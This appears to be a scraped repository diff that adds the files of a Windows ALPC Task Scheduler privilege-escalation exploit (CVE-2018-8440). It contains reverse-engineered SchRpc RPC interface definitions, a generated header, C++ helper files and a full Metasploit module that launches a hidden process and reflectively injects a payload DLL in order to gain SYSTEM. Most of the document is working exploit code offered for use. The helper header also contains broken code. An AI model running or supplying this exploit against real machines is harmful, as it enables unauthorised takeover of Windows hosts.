[out][ref]struct Struct_74_t** arg_9);
long SchRpcRetrieveTask(
[in][string] wchar_t* arg_1,
[in][string] wchar_t* arg_2,
[in]long *arg_3,
[out][ref][string] wchar_t** arg_4);
long _SchRpcCreateFolder(
[in][string] wchar_t* arg_1,
[in][unique][string] wchar_t* arg_2,
[in]long arg_3);
long _SchRpcSetSecurity(
[in][string] wchar_t* arg_1,
[in][string] wchar_t* arg_2,
[in]long arg_3);
long _SchRpcGetSecurity(
[in][string] wchar_t* arg_1,
[in]long arg_2,
[out][ref][string] wchar_t** arg_3);
long _SchRpcEnumFolders(
[in][string] wchar_t* arg_1,
[in]long arg_2,
[in][out]long *arg_3,
[in]long arg_4,
[out]long *arg_5,
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /* */[string] wchar_t*** arg_6);
long _SchRpcEnumTasks(
[in][string] wchar_t* arg_1,
[in]long arg_2,
[in][out]long *arg_3,
[in]long arg_4,
[out]long *arg_5,
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /* */[string] wchar_t*** arg_6);
long _SchRpcEnumInstances(
[in][unique][string] wchar_t* arg_1,
[in]long arg_2,
[out]long *arg_3,
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_3)] /* */ struct Struct_144_t** arg_4);
long _SchRpcGetInstanceInfo(
[in]struct Struct_144_t* arg_1,
[out][ref][string] wchar_t** arg_2,
[out]long *arg_3,
[out][ref][string] wchar_t** arg_4,
[out][ref][string] wchar_t** arg_5,
[out]long *arg_6,
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /* */ struct Struct_144_t** arg_7,
[out]long *arg_8);
long _SchRpcStopInstance(
[in]struct Struct_144_t* arg_1,
[in]long arg_2);
long _SchRpcStop(
[in][unique][string] wchar_t* arg_1,
[in]long arg_2);
long _SchRpcRun(
[in][string] wchar_t* arg_1,
[in]long arg_2,
[in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_2)] /* */[string] wchar_t** arg_3,
[in]long arg_4,
[in]long arg_5,
[in][unique][string] wchar_t* arg_6,
[out]struct Struct_144_t* arg_7);
long _SchRpcDelete(
[in][string] wchar_t* arg_1,
[in]long arg_2);
long _SchRpcRename(
[in][string] wchar_t* arg_1,
[in][string] wchar_t* arg_2,
[in]long arg_3);
long _SchRpcScheduledRuntimes(
[in][string] wchar_t* arg_1,
[in][unique]struct Struct_246_t* arg_2,
[in][unique]struct Struct_246_t* arg_3,
[in]long arg_4,
[in]long arg_5,
[out]long *arg_6,
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /* */ struct Struct_246_t** arg_7);
long _SchRpcGetLastRunInfo(
[in][string] wchar_t* arg_1,
[out]struct Struct_246_t* arg_2,
[out]long *arg_3);
long _SchRpcGetTaskInfo(
[in][string] wchar_t* arg_1,
[in]long arg_2,
[out]long *arg_3,
[out]long *arg_4);
long _SchRpcGetNumberOfMissedRuns(
[in][string] wchar_t* arg_1,
[out]long *arg_2);
long _SchRpcEnableTask(
[in][string] wchar_t* arg_1,
[in]long arg_2);
}

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,251 @@
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.00.0603 */
/* at Wed Sep 19 20:58:45 2018
*/
/* Compiler settings for rpc.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#pragma warning( disable: 4049 ) /* more than 64k source lines */
/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif // __RPCNDR_H_VERSION__
#ifndef __rpc_h_h__
#define __rpc_h_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
/* Forward Declarations */
/* header files for imported files */
#include "oaidl.h"
#include "ocidl.h"
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __DefaultIfName_INTERFACE_DEFINED__
#define __DefaultIfName_INTERFACE_DEFINED__
/* interface DefaultIfName */
/* [version][uuid] */
typedef struct Struct_18_t
{
/* [string][unique] */ wchar_t *StructMember0;
/* [string][unique] */ wchar_t *StructMember1;
long StructMember2;
} Struct_18_t;
typedef struct Struct_74_t
{
long StructMember0;
long StructMember1;
/* [string][unique] */ wchar_t *StructMember2;
/* [string][unique] */ wchar_t *StructMember3;
} Struct_74_t;
typedef struct Struct_144_t
{
long StructMember0;
short StructMember1;
short StructMember2;
byte StructMember3[ 8 ];
} Struct_144_t;
typedef struct Struct_246_t
{
short StructMember0;
short StructMember1;
short StructMember2;
short StructMember3;
short StructMember4;
short StructMember5;
short StructMember6;
short StructMember7;
} Struct_246_t;
long _SchRpcHighestVersion(
/* [in] */ handle_t IDL_handle,
/* [out] */ long *arg_1);
long _SchRpcRegisterTask(
/* [in] */ handle_t IDL_handle,
/* [string][unique][in] */ wchar_t *arg_1,
/* [string][in] */ wchar_t *arg_2,
/* [in] */ long arg_3,
/* [string][unique][in] */ wchar_t *arg_4,
/* [in] */ long arg_5,
/* [in] */ long arg_6,
/* [size_is][unique][in] */ struct Struct_18_t *arg_7,
/* [string][ref][out] */ wchar_t **arg_8,
/* [ref][out] */ struct Struct_74_t **arg_9);
long SchRpcRetrieveTask(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [string][in] */ wchar_t *arg_2,
/* [in] */ long *arg_3,
/* [string][ref][out] */ wchar_t **arg_4);
long _SchRpcCreateFolder(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [string][unique][in] */ wchar_t *arg_2,
/* [in] */ long arg_3);
long _SchRpcSetSecurity(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [string][in] */ wchar_t *arg_2,
/* [in] */ long arg_3);
long _SchRpcGetSecurity(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [in] */ long arg_2,
/* [string][ref][out] */ wchar_t **arg_3);
long _SchRpcEnumFolders(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [in] */ long arg_2,
/* [out][in] */ long *arg_3,
/* [in] */ long arg_4,
/* [out] */ long *arg_5,
/* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6);
long _SchRpcEnumTasks(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [in] */ long arg_2,
/* [out][in] */ long *arg_3,
/* [in] */ long arg_4,
/* [out] */ long *arg_5,
/* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6);
long _SchRpcEnumInstances(
/* [in] */ handle_t IDL_handle,
/* [string][unique][in] */ wchar_t *arg_1,
/* [in] */ long arg_2,
/* [out] */ long *arg_3,
/* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_4);
long _SchRpcGetInstanceInfo(
/* [in] */ handle_t IDL_handle,
/* [in] */ struct Struct_144_t *arg_1,
/* [string][ref][out] */ wchar_t **arg_2,
/* [out] */ long *arg_3,
/* [string][ref][out] */ wchar_t **arg_4,
/* [string][ref][out] */ wchar_t **arg_5,
/* [out] */ long *arg_6,
/* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_7,
/* [out] */ long *arg_8);
long _SchRpcStopInstance(
/* [in] */ handle_t IDL_handle,
/* [in] */ struct Struct_144_t *arg_1,
/* [in] */ long arg_2);
long _SchRpcStop(
/* [in] */ handle_t IDL_handle,
/* [string][unique][in] */ wchar_t *arg_1,
/* [in] */ long arg_2);
long _SchRpcRun(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [in] */ long arg_2,
/* [string][size_is][unique][in] */ wchar_t **arg_3,
/* [in] */ long arg_4,
/* [in] */ long arg_5,
/* [string][unique][in] */ wchar_t *arg_6,
/* [out] */ struct Struct_144_t *arg_7);
long _SchRpcDelete(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [in] */ long arg_2);
long _SchRpcRename(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [string][in] */ wchar_t *arg_2,
/* [in] */ long arg_3);
long _SchRpcScheduledRuntimes(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [unique][in] */ struct Struct_246_t *arg_2,
/* [unique][in] */ struct Struct_246_t *arg_3,
/* [in] */ long arg_4,
/* [in] */ long arg_5,
/* [out] */ long *arg_6,
/* [size_is][size_is][ref][out] */ struct Struct_246_t **arg_7);
long _SchRpcGetLastRunInfo(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [out] */ struct Struct_246_t *arg_2,
/* [out] */ long *arg_3);
long _SchRpcGetTaskInfo(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [in] */ long arg_2,
/* [out] */ long *arg_3,
/* [out] */ long *arg_4);
long _SchRpcGetNumberOfMissedRuns(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [out] */ long *arg_2);
long _SchRpcEnableTask(
/* [in] */ handle_t IDL_handle,
/* [string][in] */ wchar_t *arg_1,
/* [in] */ long arg_2);
extern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;
extern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;
#endif /* __DefaultIfName_INTERFACE_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// $safeprojectname$.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

View File

@ -0,0 +1,15 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#define RPC_USE_NATIVE_WCHAR
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <memory>

View File

@ -0,0 +1,70 @@
#pragma once
#include <memory>
#include <algorithm>
template<class T>
class typed_buffer_ptr {
std::unique_ptr<char[]> buffer_;
size_t size_;
public:
typed_buffer_ptr() {
}
explicit typed_buffer_ptr(size_t size) {
reset(size);
}
void reset(size_t size) {
buffer_.reset(new char[size]);
memset(buffer_.get(), 0, size);
size_ = size;
}
void resize(size_t size) {
std::unique_ptr<char[]> tmp(new char[size]);
memcpy(tmp.get(), buffer_.get(), min(size, size_));
buffer_ = std::move(tmp);
}
operator T*() {
return reinterpret_cast<T*>(buffer_.get());
}
operator const T*() const {
return cget();
}
T* operator->() const {
return reinterpret_cast<T*>(buffer_.get());
}
const T* cget() const {
return interpret_cast<const T*>(buffer_.get());
}
typed_buffer_ptr(const typed_buffer_ptr<T>& other) = delete;
typed_buffer_ptr& typed_buffer_ptr::operator=(const typed_buffer_ptr<T>& other) = delete;
typed_buffer_ptr(typed_buffer_ptr<T>&& other) {
buffer_ = std::move(other.buffer_);
size_ = other.size_;
other.size_ = 0;
}
typed_buffer_ptr& operator=(typed_buffer_ptr<T>&& other) {
if (this != &other)
{
buffer_ = std::move(other.buffer_);
size_ = other.size_;
other.size_ = 0;
}
}
size_t size() const {
return size_;
}
};

View File

@ -0,0 +1,142 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry' #TODO: Do we need this?
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
'Description' => %q(
On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
created to a file the user has read access to. After creating a hardlink, the vulnerability
can be triggered to set the DACL on the linked file.
WARNING:
The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
will be overwritten when the exploit runs.
This module has been tested against Windows 10 Pro x64.
),
'License' => MSF_LICENSE,
'Author' =>
[
'SandboxEscaper', # Original discovery and PoC
'bwatters-r7', # msf module
'asoto-r7', # msf module
'Jacob Robles' # msf module
],
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'Targets' =>
[
['Windows 10 x64', { 'Arch' => ARCH_X64 }]
],
'References' =>
[
['CVE', '2018-8440'],
['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
],
'DisclosureDate' => 'Aug 27 2018',
'DefaultTarget' => 0,
))
register_options([OptString.new('PROCESS',
[false, 'Name of process to spawn and inject dll into.', nil])
])
end
def setup_process(process_name)
begin
print_status("Launching #{process_name} to host the exploit...")
launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Sandboxes could not allow to create a new process
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_error('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
process
end
def inject_magic(process, payload_dll)
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
library_path = ::File.expand_path(library_path)
dll_data = ''
::File.open(library_path, 'rb') { |f| dll_data = f.read }
print_status("Writing payload dll into process #{process.pid} memory")
payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)
written = process.memory.write(payload_addr, payload_dll)
if written != payload_dll.length
fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
process.thread.create(exploit_mem + offset, payload_addr)
end
def validate_active_host
sysinfo['Computer']
true
rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
false
end
def validate_target
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
if sysinfo['OS'] =~ /XP/
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end
def exploit
unless session.type == 'meterpreter'
fail_with(Failure::None, 'Only meterpreter sessions are supported')
end
payload_dll = generate_payload_dll
process_name = datastore['PROCESS'] || 'notepad.exe'
print_status('Checking target...')
unless validate_active_host
raise Msf::Exploit::Failed, 'Could not connect to session'
end
validate_target
print_status("Target Looks Good... trying to start #{process_name}")
process = setup_process(process_name)
inject_magic(process, payload_dll)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error(e.message)
end
end